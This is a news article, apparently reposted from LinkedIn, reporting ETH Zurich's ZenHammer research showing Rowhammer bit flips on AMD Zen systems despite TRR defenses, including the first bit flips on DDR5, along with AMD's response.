ZenHammer Attack Gets Around AMD CPUs' Rowhammer Defenses
For the first time, ETH Zurich cybersecurity researchers have created a new version of the RowHammer DRAM (dynamic random-access memory) ZenHammer Attack that is effective against AMD Zen 2 and Zen 3 systems even in the face of mitigations like Target Row Refresh (TRR).
"This result proves that AMD systems are equally vulnerable to Rowhammer as Intel systems, which greatly increases the attack surface, considering today's AMD market share of around 36% on x86 desktop CPUs," the investigators stated.
The method, known as ZenHammer, also marks the first instance of bit flips caused by RowHammer on DDR5 chips.
The well-known attack, RowHammer, originally surfaced in 2014. It exploits the memory cell architecture of DRAM by repeatedly accessing a specific row (a technique known as "hammering"), leading to the leakage of electrical charge from one cell to another.
You might be interested in: The Role Of A Cybersecurity Specialist
This may cause random bit flips in adjacent memory rows (from 0 to 1, or vice versa), changing the contents of the memory and perhaps facilitating privilege escalation, jeopardizing system availability, integrity, and credentials.
Exploiting the physical proximity of these cells within the memory array, this ZenHammer Attack take advantage of this issue, which is anticipated to worsen as DRAM technology scales up and storage density increases.
In a paper published in November 2022, ETH Zurich researchers noted that "as DRAM continues to scale, RowHammer bit flips can occur at smaller activation counts and thus a benign workload's DRAM row activation rates can approach or even exceed the RowHammer threshold."
"Thus, a system may experience bit flips or frequently trigger RowHammer defence mechanisms even without a malicious party performing a RowHammer attack in the system, leading to data corruption or significant performance degradation."
TRR (target row refresh) is a broad term describing procedures employed by DRAM manufacturers to counteract RowHammer and is one of the most critical mitigations. These mechanisms refresh rows that are determined to be accessed frequently.
The goal is to increase the number of memory refresh operations in this way, either refreshing the victim rows prior to bits being flipped or correcting them after bits are flipped as a result of RowHammer attacks.
领英推荐
Similar to TRRespass and SMASH, ZenHammer circumvents TRR guardrails by deciphering the secret DRAM address functions in AMD systems and implementing enhanced refresh synchronization and scheduling of flushing and fencing instructions. This results in bit flips occurring on seven out of ten Zen 2 sample devices and six out of ten Zen 3 devices.
Additionally, the study determined the best order of instruction for hammering in order to increase row activation rates and enable more efficient hammering.
"Our results showed that regular loads (MOV) with CLFLUSHOPT for flushing aggressors from the cache, issued immediately after accessing an aggressor ('scatter' style), is optimal," according to the investigators.
ZenHammer holds the unique distinction of being the first technique on AMD's Zen 4 microarchitectural platform to cause bit flips on computers using DDR5 chips. However, it is limited to using the Ryzen 7 7700X, one of the ten devices that were examined.
It's important to remember that DDR5 DRAM modules were thought to be resistant to RowHammer assaults since they replaced TRR with a novel form of security known as refresh management.
The investigators stated, "The changes in DDR5, such as improved RowHammer mitigations, on-die error correction code (ECC), and a higher refresh rate (32 ms), make it harder to trigger bit flip."
"Given the lack of bit flips on nine of 10 DDR5 devices, more work is needed to better understand the potentially new RowHammer mitigations and their security guarantees."
In a security bulletin, AMD stated that it is evaluating RowHammer bit flips on DDR5 devices and would offer an update when the assessment is finished.
"AMD microprocessor products include memory controllers designed to meet industry-standard DDR specifications," it stated. "Susceptibility to ZenHammer Attack varies based on the DRAM device, vendor, technology, and system settings."